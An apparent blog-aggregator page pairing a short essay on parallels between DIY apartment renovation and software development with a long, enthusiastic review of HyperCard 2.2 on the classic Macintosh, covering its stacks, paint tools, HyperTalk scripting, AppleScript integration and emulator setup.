I had the opportunity to do some slight renovation on an apartment. It was nothing fancy; it involved the following:

removing the old carpet
removing the wallpaper (surprisingly difficult and annoying!)
plastering, filling in holes
painting the walls
installing new power sockets
installing the cheapest laminate flooring

I expected it to take a few months’ worth of weekends. It took over half a year. Oops.

During that time I had a lot of time to think about all sorts of things. It was a nice zen activity for me, if we leave out the part where I was physically exhausted; on the bright side, I was mentally relaxed by the time I got back to work. And by the time I was mentally exhausted after a long work week, I was ready to do some physical work.

My previous experience with construction and renovation work is pretty minimal. I have a toolbox, and I’m a tool myself, but that was pretty much it. This experience was characterized by a lot of improvisation and a little bit of googling for the parts where I felt genuinely out of my depth, such as installing the laminate floor.

I realized quite soon that renovation and software development are very similar in a lot of ways. After all, both involve building something, and they both contribute to my back pain and deteriorate my dwindling sanity. Here are some parallels that I observed during the many, many weekends spent renovating an apartment.

I did my best to reasonably plan ahead and calculated things like floor and wall surface areas with a reasonable degree of accuracy, plus a 10% buffer. That buffer paid off big time. The part where you have to prepare a surface for plastering and painting is super annoying, but the end result depends on this step going well. It’s like planning in software development: if you just start coding and ignore the rest, you will end up with a crappy result. Making a few initial up-front investments into dust-proofing a room during renovations is also a wise investment. Learned that a bit too late myself.

I felt it multiple times during the renovation work: sometimes you just get into a groove and the time just flies. It was usually interrupted by my body letting me know that I should probably take a break and eat something.

Doing something manually sucks. The speed at which a sanding machine can make the walls nice and smooth is crazy. The feeling is comparable to writing Java in Notepad vs IntelliJ IDEA: one is infinitely more convenient and faster, but costs more in money. At some point it’s counterproductive, and you’re unlikely to use them all, but nevertheless it’s fun to browse around and pick something new up. Kind of like opening up the awesome-selfhosted list to see what else you can put on your home server.

It’s terrible to redo something you already did, but sometimes it has to be done for the best end result. I didn’t do this for one room, and it bit me in the butt a few months later with the floor. Oh well.

Sometimes you’ll discover an exposed electrical wire behind the wallpaper. Sometimes removing the baseboard removes a lot of the plaster on the wall. Sometimes you will trip over the big bucket of water and cause a big mess. Sometimes you’ll unknowingly drill into an electrical cable. It happens. Be ready for it.

I blew past any pessimistic estimates that I set for myself, mainly because of the fun little surprises I had during the construction work. I knowingly left some work unaddressed because tackling it would’ve required a significant time and money investment. It’s fine, we’ll get to it later, I promise. In one area it has been working out fine, but in another I am starting to suspect that doing things the proper way would’ve probably been a good idea. It is what it is.
There’s a reason professionals exist, and a good one. I’m starting to think that hiring one would have helped avoid a lot of the headache, but then I would have missed out on learning things myself and learning more about the history of the apartment. Hourly rates are high in both construction and software development, unfortunately. In construction, literally.

With the hallways, I could not be arsed to do everything properly there as well, so I did things a bit differently and more creatively, and it turned out okay. MVP mindset! I asked a local electrician for opinions on the electrical wiring, and ended up getting valuable advice that saved me a lot of potential headache and additional construction effort.

It would be unfair of me to discount the back-breaking effort that goes into construction and renovation work. In software development, you usually don’t end up maiming or killing yourself. I cut myself accidentally a few times, but luckily it was not that drastic. I even managed to avoid being electrocuted, somehow.

I love Torx screws now. I never had a stripped screw head with those, but I had at least 10+ with normal Phillips heads. The Torx heads have numbers in them, so it’s very difficult to accidentally mess up. Cutting baseboards is my least favourite activity; I can never get the cuts right, even with guidance and hand tools. A table saw would have probably helped a bit, but I don’t yet have one.

It was fun to learn something in an area that I don’t usually dabble in. It felt incredibly rewarding to take a room that was kind of crummy and turn it into something nice-looking and livable. I made some mistakes, but I see them as a very valuable learning experience that I will hopefully get to utilize when planning and building my dream home, with a garage, workshop, server closet and a great sauna. I love building, I love learning, and that explains my passion for software development and self-hosting very well.

It was also good to work on a project with a set goal. It’s unfortunately very often the case in software development that you’ll have a project with non-stop work. No matter what you achieve and where you get with the project, more work awaits. Always. There is little time to regroup, reflect, and be satisfied with what you’ve achieved. There is no set end point. With renovation, I finally felt that, and I wish to bring more of that into my day job.

After all that effort, software development doesn’t sound all that bad, even if it has some existential issues around maintenance, security and the freedom to do whatever you want with your devices.

0 views
Stone Tools 1 month ago

HyperCard on the Macintosh

Throughout the Computer Chronicles' 19 years on-air, various operating systems had full episodes devoted to them, like Macintosh System 7, UNIX, and Windows 95. Only one piece of consumer software had an entire episode devoted to it. You can see and hear Stewart Cheifet's genuine excitement watching Bill Atkinson show it off. Later, Cheifet did a second full episode on it. HyperCard was a "big deal."

Big, new things are scary. In a scathing, paranoid, accidentally prescient article for Compute Magazine's April 1988 issue, author Sheldon Leemon wrote of HyperCard, "But if this (hypertext) trend continues, we may soon see things like interactive household appliances. Imagine a toaster that selects bread darkness based on your mood or how well you slept the night before. We should all remember that HyperCard and hypertext both start with the word hype. And when it comes to hype, my advice is 'just say no.'" Well, you can't make Leemonade without squeezing a few Leemons, and this Leemon was duly squeezed. "Do we really want to give hypertext to young school children, who already have plenty of distractions? We really don't want him to click on the section where the Chinese invent gunpowder and end up in a chemistry lesson on how to create fireworks in the basement." (obligatory ironic link)

Leemon-heads were in the minority, obviously. Steve Wozniak called Atkinson's brainchild "the best program ever written." So did David Dunham. There was a whole magazine devoted to it. Douglas Adams said, "(HyperCard) has completely transformed my working life." The impact it made on the world is felt even today. Cyan started life as a HyperCard stack developer and continues to make games. Wikipedia was born from early experiments in HyperCard. The early web was strongly influenced by HyperCard's (HyperTalk) vision. Cory Doctorow's first programming job was in HyperCard. Bret Victor built "HyperCard in the World," which evolved into Dynamicland.

With a pedigree like the above, it is no spoiler to say that HyperCard is good. But I must remove the spectacles of nostalgia and evaluate it fairly. A lot has happened since its rise and fall, both technologically and culturally. Can HyperCard still deliver in a vibe-coded TypeScript world?

Version 2.2 of HyperCard is significant for a few notable reasons: first, it adds AppleScript support; second, it adds a script debugger; and finally, it marks the return of HyperCard from Claris back into Apple's fold.

Reviewing and evaluating HyperCard is a bit like trying to review and evaluate "The Internet." And MacPaint. And a full application development suite. A sane man would skedaddle upon seeing the 1,000 (!) pages of The Complete HyperCard 2.0 Handbook, 3rd Edition by Danny Goodman, but not this man. Make of that what you will.

It's difficult to choose a specific task for this post. I'll build the sample project from the Handbook, but let's note what the book says about its own project: "In a sense, the exercise we'll be going through in this chapter is artificial, because it implies not only that we had a very clear vision of what the final stack would look like, but that we pursued that vision unswervingly. In reality, nothing could be further from the truth." I have no such clear vision. It's kind of like staring at a blank sheet of paper and asking myself, "What should I make?" I could fold it into origami, use it as the canvas for a watercolor painting, or stick it into a Coleco ADAM SmartWriter and type a poem onto it.
Art needs boundaries, and I don't yet know HyperCard's. So, I'll just start at the beginning, launch it, and see where it takes me.

Launching HyperCard takes me to the Home "stack," where a "stack" is a group of related "cards" and a card is data supercharged with interaction. In beginner's terms, it's fair to think of a stack as an application, though it requires HyperCard to run. (HyperCard can build stand-alone apps, but that's not a first-time user's experience.) Atkinson does mean to evoke the literal image of a stack of 3x5 index cards, each holding information and linked by relationships you define. Buttons provide the means to act on a card: stepping through cards in order, finding related cards by keyword, searching card data, or triggering animations. All of this is possible, trivially so. At first blush that doesn't sound particularly interesting, but MYST was built in it, should you have any doubt it punches above its weight class.

Today, I can describe a stack as being "like a web site" and each card as being "like a page of that site," an intellectual shorthand which didn't exist during HyperCard's heyday. To use another modern shorthand, "Home" is analogous to a smartphone's Home screen, almost suspiciously so. You can even customize it by adding or deleting stacks of personal interest to make it your own.

(Video, 0:36; contains intense flashing strobe effects.) Beyond Cyberpunk pushed HyperCard boundaries in its own way. A web version is available, minus most of the original charm.

Walking through the Home card, the included stacks provide concrete examples illustrating the power of HyperCard's development tools. Two notable features are present, though they are introduced so subtly it would be easy to overlook them. The first is the database functionality the program gives you for free. Open the Appointments or Addresses stacks, enter some information, and it will be available on next launch as searchable data. It's stored as a flat file, nothing fancy, and it's easier than Superbase, which was already pretty easy. The second is that after entering new data into a stack, you don't have to save; HyperCard saves automatically. It happens so transparently it almost tricks you into thinking all apps behave this way, but no, Atkinson specifically hated the concept of saving. He thought that if you type data into your computer and yank the power plug, your data should be as close to perfect as possible. This "your data is safe" behavior is inherent to every stack you use or build. You don't have to opt in. You don't have to set a flag. You don't have to initialize a container. You don't need to spin up a database server. You don't even have to worry about how to transfer the data to another system; the data is all stored within the data resource of the stack itself. Just copy the stack to another computer and be assured your data comes with you.

There is one downside to this behavior as a typical Macintosh end-user. If you want to tinker around with a stack, take it apart, and see how it's built, you must make sure you are working with a copy of that stack! As saving happens automatically, it can be easy to forget that your changes are permanent: "I didn't hit save! What happened to my stack?" Thus, an original stack risks getting junked up or even irreparably broken by your experiments. "Save your changes" behavior is taught to us by every other Macintosh program, but HyperCard bucked the careful conditioning Mac users had learned over the years.
At its most basic level, without even wanting to make one's own stacks, HyperCard offers quite a lot. Built-in stacks give the user an address book, a phone directory, an appointment calendar, a simple graph maker, and the ability to run (and inspect!) the thousands of stacks created by others. The bundled stacks are easy to use, but far from being "robust" utilities. That said, they're prettier and easier to use than a lot of the type-in programs from the previous 8-bit era, and you're free to modify them to suit your needs, even just aesthetically. Free stacks were available on BBS systems, bundled with books, or on cover disks for magazines. HyperCard offered a first glimpse at something slantingly adjacent to the early world wide web. Archive.org has thousands of stacks you can look through to get a sense of the breadth of the community. Learn about naturalism, read Hitchhiker's Guide to the Galaxy (official release!), or practice your German. There are TWO different stacks devoted to killing the purple children's dinosaur, Barney. Zines, expanded versions of the bundled stacks, games, and other esoterica were available to anyone interested in learning more about, say, clams and clam shell art. I am being quite sincere when I say, "What's not to love?"

Content consumption is fine and dandy, but it is on content creation that HyperCard focuses the bulk of its energies. With so many stacks expressing so many ideas, and reading how many of those were made by average people with no programming experience, the urge to join that community is overwhelming.

Cards are split into two conceptual domains: the background and the foreground. In modern presentation software like PowerPoint or Google Slides, these are equivalent to the template theme (the stuff that tends to remain static) and the slide proper (the per-slide dynamic attributes). The layers of each domain start with a graphic layer fixed to the "back." Every object added to the domain, like a button, is placed on its own numbered layer above that graphic layer, and those can be reordered. It's simple enough to get one's mind around, but the tools don't do a particularly good job of helping the user visualize the current order of a card's elements. Each element must be individually inspected to learn where it lives relative to other layers (objects). An "Inspector" panel would be lovely.

HyperCard has basic and advanced tools for creating the three primary elements which compose a card: text, graphics, and buttons. These elements can exist on background and/or foreground layers as you wish, keeping in mind that foreground elements get first dibs on reacting to user actions. Text is put down as a "field" which can be formatted, typed into, edited, copy/pasted to and from, and made available to be searched. That grants instant database superpowers to the stack. Usually a field holds an amount of text which fits visually on the card, but it can also be presented as a scrollable sub-window to hold a much larger block of text, for when your ideas are just too dang big for the fixed card size. Control over text formatting is more robust than expected. Kerning is non-existent, but font, size, character styles, alignment, and line spacing are available. Macintosh bitmap fonts shipped in pre-built sizes, meaning they were hand-drawn expressly to look their best at those sizes. Scaling text is allowed, but you may need to swallow your aesthetic pride. Or draw the text yourself?
"Draw the text yourself" is a real option, thanks to the inclusion of what seems to be a complete implementation of MacPaint 1.x . The tools you know and love are all here, with selectable brush width, paint/fill patterns, lasso tool, shapes both filled and open, spray can, and bitmap fonts (if you don't need that text to be searchable). Yes, even the fabled eraser which drew such admiration during Atkinson's first MacPaint public demo is yours. Yesterday's big deal is HyperCard 's "no big deal." These tools are much more fleshed out than they first appear, as modifier keys unlock all kinds of helpful variants. Hold down while drawing with the pencil tool to constrain it horizontally or vertically. Hold down while using the brush tool to invert its usage into erasure. And so on. The tool palette itself "tears off" from the menu and is far more useful in that state. Double-clicking palette icons reveals yet further tricks: the pencil tool opens "fat bits" mode, the eraser clears the screen. The Handbook devotes over 80 pages to the drawing functions. I'll just say that if you can think it, you can draw it. Remember two gotchas: there's only one level of undo, and all freehand drawing happens in a single layer . The pixels you put down overwrite the pixels that are there, period. The inclusion of a full paint program makes it really fun to have an idea, sketch it out, see how it looks, try it, and seamlessly move back and forth between art and design tools (and coding tools). The ease of switching contexts feels natural and literal sketches instantly become interactive prototypes. Or final art, if you like! Who am I to judge? It's kind of startling to be given so much freedom in the tools. As an aside, I took a quick peek at modern no-code editor AirTable and tried to build a simple address book. Beyond the mandatory signup and frustration I felt poking around the tools, I wasn't allowed to place a header graphic without paying a subscription fee. Progress! What is hypermedia without hyperlinks? In HyperCard these are implemented as buttons, and if you've ever poked around in Javascript on the web, you already have a good "handle" (wink wink) on how they work. Like text fields, they have a unique ID, a visual style, and can trigger scripts. Remember, HyperCard debuted with scripting in 1987 and similar client-side scripting didn't appear in web browsers until Netscape Navigator 2.0 c irca 1995. This was bleeding edge stuff. Adding an icon to a button is a little weird, thanks to classic Macintosh "resource forks." All images are stored in this special container, located within the stack file itself. You can't just throw a bunch of images into a folder with a stack and access them freely. Like the lack of multiple undo, this requires a bit of "forget what you know, visitor from the future." Knowing icon modification is a pain in the butt, Atkinson helpfully added an entire icon editor mini-program to HyperCard . Typically you would have to modify these using ResEdit, a popular, free tool from Apple which allowed users to visually inspect an application's resource fork. Here's a 543 page manual all about it. (Were authors paid by the cubic centimeter back then?) With ResEdit , all sorts of fun things could be tweaked in applications and even the Finder. You could redraw icons shown during system level alerts and bomb events, or the fill patterns used to draw progress bars. You could hide or show menus in an application, change sound effects, and more. 
It's dangerous territory, screwing around with system resources, but it's kind of fun because it's dangerous. Hack the system! Buttons can be styled in any number of normal, typical, Macintosh-y ways, but can also be transparent. A transparent button is just a rectangle defining a "hotspot" on the screen, especially useful on top of an image which already visually presents itself as "clickable." To add a hyperlink to text, draw a transparent button on top of that text, wire it up, and you're done. I imagine you can already see the problem. Rewrite the text, and now you must manually reposition your button over the text's new location, a fix which lasts exactly as long as the text never gets moved or edited again. Sure hope the text didn't split onto two lines during the move. HyperCard does have a sneaky way to fake this up programmatically, but HTML hyperlinks in text would prove to be an unquestionable improvement. Yet, HyperCard speeds ahead of yet-to-arrive HTML once more with image hyperlinks. Draw or paste in a picture, say a map of Europe, then draw transparent buttons directly on top of each country. When you're done, it looks like a normal map, but now has clickable countries, which could be directed to transition, with a wipe, to an information page about the clicked country, without ever touching a script. HyperCard's links are a little brain-dead to be sure, but they are also conceptually very, very easy to grasp. What I really enjoy about the HyperCard approach is how it leverages existing knowledge of GUIs and extends that a little into something familiar yet significantly more powerful.

Sound may be the biggest gap in HyperCard's tool-set. This is not to say that sound effects are completely missing, but they are not given nearly the same thoughtful attention as graphics and scripting are. For reference, where graphics get 80+ pages in the manual, sound gets less than 10. You can only attach sound effects to your cards through scripting. That can be simple beeps, a sequence of notes in an instrument voice, or a prerecorded sound file. Given the lavish set of tools for drawing, I honestly expected at minimum a piano keyboard for inputting simple compositions. There were third-party music-making stacks to assist with that, shunting off the responsibility to other software. That's not a crime, per se, but it does feel like a noteworthy gap in an otherwise robust tool-set.

In the manual, a no-code tutorial builds a custom Daily To-Do stack, with hyperlink buttons, searchable text, and custom art, in just 30 pages. By the end of the tutorial the user has hand-crafted a useful application to personal specifications, which can even be shared with the world, if desired. Not a bad day's work, and I'd be hard-pressed to duplicate that feat today, to be perfectly honest. This is a deeply empowering program. Even with just 30 minutes of work the user has the beginnings of something interesting. The gap between the apps she uses daily and what she's able to build in a weekend at least feels smaller than it ever has. Success looks achievable. To-do lists, address books, recipe cards, and the like are all well and good, but every artist eventually feels that urge to push forward and move beyond. At this point I'm only a third of the way through the book, so what could the other 600 pages possibly have to talk about? The same thing the rest of this post will: programming. I know, I know, for a lot of people this is a boring, obtuse topic.
Believe me, I understand. A lot of people were put off by programming until HyperCard made it accessible. In the January 1988 Compute Magazine (Leemon's rant shows up a few months later), David D. Thornburg noted, "it proves that the proper design of a language can open up programming to people who would never think of themselves as programmers." This is backed up by firsthand quotes during HyperCard's 25th anniversary. The fact is, if you've poked around in HyperCard at all, you've already been programming; you just didn't know it. We call it "no-code" now, though I'd argue HyperCard is more like a coding butler. There is code, you just aren't required to write it for many common tasks. "No code" only applies to you, the end-user. HyperCard is programming on your behalf.

HyperTalk, Dan Winkler's contribution to the project, is HyperCard's bespoke scripting language. Patterned after Pascal, a popular development language for the Macintosh at the time (Photoshop was originally developed in Pascal), HyperTalk was designed to be as easy to read and write as possible. In so doing, it attempts to tear down the gates of programming and offer equal access to its community. At its core, HyperCard is a collection of objects which send and receive messages. HyperTalk takes an object-oriented approach to stack development. There are four types of HyperCard objects: stack, card, button, and text field. Let's consider the humble button. A button can receive a message, like "the user clicked the mouse on me." When that occurs, the button has an opportunity to respond to that message in some fashion. Maybe it displays a graphic image. Maybe it plays a sound. Maybe it sends its own message to a different object to do something else. Scripts define when and how objects process messages. In HyperCard's visual editor, scripts are kind of "inside" objects. Double-click a button to poke at its internal anatomy, with the script being its "brain." Even if you don't know how to write a HyperTalk script, you can probably read it without much difficulty. Baby steps. Pressing a button on your mouse moves that button physically "down," and lifting your finger allows it to move back "up." So the simplest script says "when the mouse button is released, beep." Want three beeps? Forget the beeps, let's go to the next card of this stack. No, not this stack, go to the last card of a different stack. Want to add a visual transition using a special effect and also do the other stuff? Each step is a one-line change (the whole progression is sketched below). This compositional approach to development helps build skills at a natural pace. Add new behaviors as you learn and see the result immediately. Try new stuff. Tinker. Guess at how to do something. Saw something neat in another stack? Open it and copy out what you like. Experiment. Share. Play. HyperCard wants us to have fun. I am having fun. HyperTalk provides fast iteration on ideas and allows us to describe our intent in the same terminology we have absorbed over time as end-users. The perceived distance between "desire" and "action" is shortened considerably, even if this comes with unexpected gotchas. The big gotcha can be a bit of a rude awakening, as English-ish languages tend to be. At first, they seem so simple, but in truth they are not as flexible as true natural language. Going back to the earlier examples, can you intuit which of the following will work and which will error? They all seem reasonable, but only the third one works.
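In HyperTalk, that progression looks something like this (a sketch of the idea rather than the Handbook's exact listings):

    on mouseUp
      beep                              -- when the mouse button is released, beep
    end mouseUp

    on mouseUp
      beep 3                            -- three beeps instead
    end mouseUp

    on mouseUp
      go to next card                   -- next card of this stack
    end mouseUp

    on mouseUp
      go to last card of stack "Home"   -- a different stack entirely
    end mouseUp

    on mouseUp
      visual effect dissolve            -- queue a transition effect
      go to last card of stack "Home"   -- the same jump, now with a dissolve
    end mouseUp

And here are three seemingly reasonable ways to phrase that jump (illustrative permutations, not the book's own examples), of which only the third works:

    go to stack "Home" last card
    go last card to stack "Home"
    go to last card of stack "Home"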
This is where the mimicry of English fails the language, because English-ish suggests to a newcomer a free-form expression of thought which HyperTalk cannot hope to understand. Programmers understand that function names and the parameters which drive them are necessarily rigid and ordered. A more programmer-y definition of the command might be something like go [to] <position> card [of stack "<name>"] (bracketed parts optional, order fixed). Thus exposed, those familiar with typical coding conventions will immediately understand that HyperTalk (often) requires a similarly specific order of parameters to a command. We can't phrase things any way we please; we must adhere to the language's hidden order. HyperCard comes with help documentation in the form of searchable stacks, complete with sample scripts to test and borrow from as one grows accustomed to its almost-English sensibilities. Still, it can absolutely be frustrating when something that appears to be perfectly valid fails anyway.

Another knock against HyperTalk's implementation in HyperCard is the code editor itself. It is so bare-bones I thought I had missed something when installing the program. It will format your code indentation, and that's it. At no point will you receive any warning of any kind of mistake. It happily accepts whatever you write. Only upon trying to run a script will errors surface. On the one hand it is fast and easy to write a script and test it. But it still requires extra steps which could have been avoided had the editor behaved a bit more like Script Editor, the AppleScript development tool bundled with Mac OS. Script Editor watches your back a little more diligently. Despite the not-quite-English frustrations, it is still comfortably ahead of any other option of the day.

The "Hello World" of HyperCard is a fully functional to-do management application. What a good feeling that engenders in a Mac user dipping a cautious toe into development waters. That feeling builds trust in the system and oneself, and maybe, just maybe, grows a desire to keep learning. The full list of things you can do with HyperTalk is too vast to cover. Here's a teensy weensy super tiny overview, just to whet your appetite. A few example properties you can set on objects: the name, style, visible, and loc of a button or field, for instance. A small sampling of some built-in functions: the date, the time, the mouseLoc, and random. You have plenty of boolean, arithmetic, logical, string, and type operators to solve a wide range of common problems. If you're missing a function, write a new function and use it in your scripts the same as any native command. If some core functionality is missing, HyperCard can be extended via XCMDs and XFCNs, which are new commands and functions built in native code. These can do things like add color support, access SQL databases, digitize sounds, and even let you use HyperCard to compile XCMDs inside of HyperCard itself. Real ouroboros stuff, that.

With HyperCard 2.2, AppleScript was added as a peer development language. At one point, HyperTalk was considered as not just HyperCard's scripting language, but the system-wide scripting language for the entire Macintosh ecosystem. AppleScript was developed instead, taking obvious cues from HyperTalk, while throwing all kinds of shade on Dave Winer's (that guy again!) Frontier. Ultimately, Frontier got Sherlocked. AppleScript allows for scripting control over the system and its applications (circa System 7.5.5), in prose-like one-liners along the lines of tell application "Finder" to empty the trash. Like HyperTalk, you can probably understand that even if you can't write it off the top of your head. Through this synergy, external applications can be controlled directly by HyperCard.
PageMaker 5.0 even shipped with a HyperCard stack. In the video below, I'm clicking a HyperCard button, prompting for text, then shoving that text into an external text editor and applying styling.

The elephant in the room

Now, all of this talk about using plain English to program has many of you shouting at the screen. Don't worry, I hear you loud and clear. I agree, we should talk about a modern natural language programming environment. Let's talk about Inform 7. For those who don't know, Inform has been a stalwart programming language for the development of interactive fiction (think Zork and other text adventures) for decades. For the longest time, Inform 6 was the standard-bearer, and it looked like "real programming code" complete with semicolons, so you know it was "serious." From the "Cloak of Darkness" sample project: it describes the room to the player, defines where the exits lead, and specifies that the room has light. In the early 2000s, Inform creator Graham Nelson had an epiphany. Text adventure engines have an in-game parser which accepts English language player input and maps it to code. Could we use a similar parser to accept English language code and map it to code? Inform 7 is the result of that research, and it attempts something significantly more dramatic than HyperTalk. Let's see how to describe that same room from earlier. I know you might be incredulous, but this is legit Inform 7 code which compiles and plays. Inform 7 certainly looks far more natural than the mimicry of HyperTalk. This looks like I can have a conversation with the system and it will do what I want. Attempt 1. This does not work. How embarrassing. Let me try that again. Attempt 2. I have to say "holds," not "has," to give the stone to the player. The "if" section continues to fail. Success! Though we had to take a suspiciously programmer-y approach to get it to work. Also, we use "holds" to give the object to the player, but use "carries" to check inventory. The emphasis here is that it looks like I can write whatever I want, but look too hard and the trick of all such systems is revealed: to program requires programming, and programming requires structure. Learning how to structure one's thoughts to build a program which works as expected is the real lesson to learn. That lesson can sometimes be obfuscated by the friendly languages.

Alright, alright, I'll talk about vibe coding, but what, realistically, is there to say? It's a new phenomenon with very little empirical evidence to support or refute the claims of its efficacy. One barrier it may remove is the reliance on English as the base language for development tasks. A multi-lingual HyperCard-alike could be something special indeed. I asked ChatGPT to recreate a HyperCard stack for me in HTML with this prompt. Here's the result. Here's the code. It seems to work, but I don't know web development well enough to verify it. Nor is there impetus for me to learn to understand it. I could just as easily have asked for this in "the best language for this purpose." Unlike HyperTalk, this approach doesn't ask me to participate in the process which achieved the result; the result itself is all I'm asked to evaluate. When I asked for a change, I received an entirely different design and layout, but it did contain the functional change. Was that battle won or lost? I also have no idea how to test this, because my spec was also vibes. I could write a complete spec and ask the LLM to build to that, I suppose.
There are people in software development who do exactly that, and they are not called "coders." This is "vibe product management." I'm unqualified to determine if that's good enough, but I can say that there is at least one person who seems quite happy with her vibe coding results. While I'm pretty sure her project could be built in HyperCard in an hour, HyperCard doesn't exist. Of course novices like her will turn to LLMs. What other option is there? I would like to point out, however, that with "vibe coding" we aren't seeing the same Precambrian explosion of new life that we saw after HyperCard debuted.

The struggle is real

So I sure have spent a good amount of time talking about the pitfalls and quicksand of using natural language as a programming language. Once we've built simple tools with ease, we quickly learn how much we don't know about programming when we try more advanced techniques. There appears to be a barrier beyond which it makes development harder. This has been covered by many people over the years. Dave Winer, of ThinkTank fame, had thoughts on this: "Hypercard was sold this way, as was COBOL. You'd tell the system, in English, what you wanted and it would make it for you. Only trouble is the programming languages only looked superficially like English, to someone who didn't know anything about programming. Once you got into it, it was programming." Yep. In the February 1988 Compute Magazine, Thornburg concluded his review of HyperCard: "My feeling at this time is that HyperCard lowers the barrier to creating applications for the Mac by quite a bit, but it still requires the discipline and planning required for any programming task." Fair enough. Edsger W. Dijkstra had thoughts on the matter of natural language as a programming language. He said of this pursuit, "When all is said and told, the 'naturalness' with which we use our native tongues boils down to the ease with which we can use them for making statements the nonsense of which is not obvious." It's true, it can be hard to describe to another human what we want, let alone a computer. We humans are nothing if not walking contradictions, in word and action. If you'll indulge me, I'd like to issue my bold rebuttal to all of this.

So what?

So what if these languages aren't mathematically rigorous enough for "serious" programming? So what if they're hard to scale? So what if we sometimes get caught up in English-ish traps? So what if using these tools creates "bad" (Dijkstra's word) habits which prove hard to overcome? I'm not naive; I wouldn't run a nuclear reactor on HyperTalk. However, I'm concerned that movements in programming "purity" have also gatekept the hobbyist population. Thousands of people built thousands of stacks in HyperCard. Businesses were born from it. Work got done. Non-programmers built software that helped themselves or helped other people. Isn't that the whole point of programming: to help people solve problems? HyperCard and HyperTalk should have set a new baseline for what our computers do right out of the box. If this is your idea of no-code Nirvana, I'm not going to stand in your way. I'm not going to join you, but I'm not going to stop you.

Plot twist

There is a case study of a Photoshop artist working for a major retail advertising department, who didn't know a thing about programming, despite many attempts. It was precisely the English-ish language of AppleScript which finally allowed the principles and structure of programming to "click." He has worked as a professional iOS developer for almost 20 years now. I doubt you're biting your nails in suspense, "Who could this mystery person possibly be?!" It was me.
There is a direct line, a single red thread on the conspiracy cork-board, between my exposure to AppleScript and my current job as an iOS engineer. Seeing people's work become just a little bit easier with the AppleScript tools I built was incredibly gratifying. Those benefits were tangible, measurable. What I built was as real as any "proper" application. When I outgrew AppleScript, I moved on. Whatever bad habits I had learned, I unlearned. Was this a difficult path toward software engineering enlightenment? Perhaps, but it was my path and it was thanks to tools which were willing to meet me halfway.

Get hyped

I think everyone should absolutely use HyperCard, but probably not for the reason you think. I do not kid myself into believing HyperCard can be a useful daily driver, except for the most tenacious of retro-enthusiasts. Like other retro software, if you want to build something for yourself and it's useful, then that's great! But, the browser won the hypertext war, period. I can quote every positive review. I can enumerate every feature. I can show you stacks in motion, and you wouldn't be wrong to shrug in response. I get it. You're a worldly individual; you've seen it all before. I don't think you've felt it before, though. HyperCard must be touched to be understood. So do it. Build a few cards, a small stack even, and appreciate how HyperCard's fluidity matches that of human expression. Feel the ease with which your ideas become reality. Build something beautiful. Now throw it all away. Then. Then! Then you'll understand that the only way to appreciate its brilliance is to have it taken away. When you're back in present-day, wondering why a 20GB application can't afford the same flexibility as this 1MB dynamo, then you'll understand. "Why can't I change this? Why can't I make it mine?" Such questions will cut you in a dozen small ways every day, until you're nothing but scar tissue. Then you'll understand. I don't think you'd be reading this blog if you didn't believe, deep down in your core, "things could be better." HyperCard is concrete evidence which supports that belief. And it was created and killed by the same company which voiced precisely the same "things could be better" conviction in their "1984" commercial. Apple called for a revolution. I'm calling for the next one.

My final "To Do" stack. I went beyond the book and made large, animated daily tabs (a tricky exploration of HyperCard's boundaries, as they exceed the 32x32px max icon size) and a search field.

Sharpening the Stone

I had a lot of trouble setting up my work environment this time around. The primary stumbling block is that Basilisk II, which initially made the whole Mac environment setup easy, has a Windows timing bug which renders HyperCard animations unusably slow. Mini vMac works great with HyperCard, and feels very snappy, but it couldn't handle a disk over 2GB (I had built a 20GB hard drive for Basilisk II). So I tried to build a new disk image in Mini vMac, but it has a weird issue where multi-disk installations "work" except the system ejects the first disk it sees to "accept" the next disk in the install process. That disk was the disk I was trying to install the operating system onto, so the whole endeavor became a comedy of errors. I had to go back into Basilisk II to build a 2GB disk for use in Mini vMac.
My working setup:

Mini vMac v36.04 for x64 on Windows 11
Running at 4x speed
Magnification at 2x
Macintosh System 7.5.5 (last version Mini vMac supports)
Adobe Type Manager v3.8.1
StickyClick v1.2
AppleScript additions
8MB virtual RAM (Mini vMac default)
HyperCard 2.2 w/scripting additions

Emulator Improvements

I found 4x speed in the emulator felt very nice; max speed for installations. Install the ImportFl and ExportFl utilities for Mini vMac to get data into and out of the virtual Macintosh from your host operating system easily. The emulator never crashed, though I definitely had troubles with Macintosh apps crashing or running out of memory. While I could get the emulator to boot with my virtual hard drive, I couldn't get that to persist during a "system reboot." Maybe there's a setting I overlooked. Don't forget to "Get Info" on your apps and manually set their memory usage. Extensions enable classic Mac conveniences. I recommend StickyClick, otherwise you have to continuously hold the mouse button down when using menus.

There's not really a foolproof way to bring stacks into the modern world. HyperCard's stack format has been reverse-engineered and made compatible after-the-fact by a few modern attempts to revive the platform. Importing a stack into a modern platform is possible, as is conversion to HTML. There's going to be a lot of edge cases and broken things during this process, but it's worth it if the stack is awesome. You did build an awesome stack, didn't you?! (I don't think any of these ford the AppleScript river, though.)

Decker looks very much like HyperCard, but looks only. No importing of original stacks, and the scripting language is completely different, but that adorable drawing app built in it looks great! Source code for Decker here!
LiveCode is trying to keep the dream alive in a modern context and can apparently import HyperCard stacks (with caveats). (Note: a completely new version, with obligatory AI, went live just a few days before this post!)
HyperNext Studio might be interesting to some.
Stacksmith seems to have stalled out in development, but could be fun to play around with.
HyperCard Simulator looks quite interesting and has a stack importer. It works in Japanese, too! I imported Apple's "HyperTalk Reference" stack without issue, though its hyperlinks don't work; I can step through cards. I also see misaligned images and buttons at times, but otherwise it's a great presentation. It can also export a stack to HTML.
WyldCard, a Java implementation, was updated in 2024. Needs a little knowhow to get your Java build environment set up, and I'm unclear if it can import original stacks.
hypercard-stack-importer says it will convert a stack to HTML.

HyperCard's remaining warts:

Built-in sound support is woeful.
What you build is essentially constrained to the classic Macintosh ecosystem (though you may find a way to convert the stack; see above).
The script editor is too bare-bones for those who aspire to Myst-like greatness.
Color support is a 3rd-party afterthought.
Textual hyperlinks can really only be faked through button overlays.
It is possible to use HyperTalk to grab a clicked word in a text field, which might be enough context to make a decision upon. HyperTalk can be frustrating when implementing advanced ideas. YMMV.
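A minimal sketch of that clicked-word trick, assuming a locked text field, HyperCard 2.x's clickText function, and a hypothetical convention of naming cards after keywords:

    on mouseUp
      -- clicking a locked field still sends mouseUp, and
      -- "the clickText" holds the word the user clicked on
      put the clickText into theWord
      if theWord is not empty then
        go to card theWord   -- hypothetical: one card per keyword
      end if
    end mouseUp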

Brain Baking 1 month ago

Mariage Frères Tea Reviews

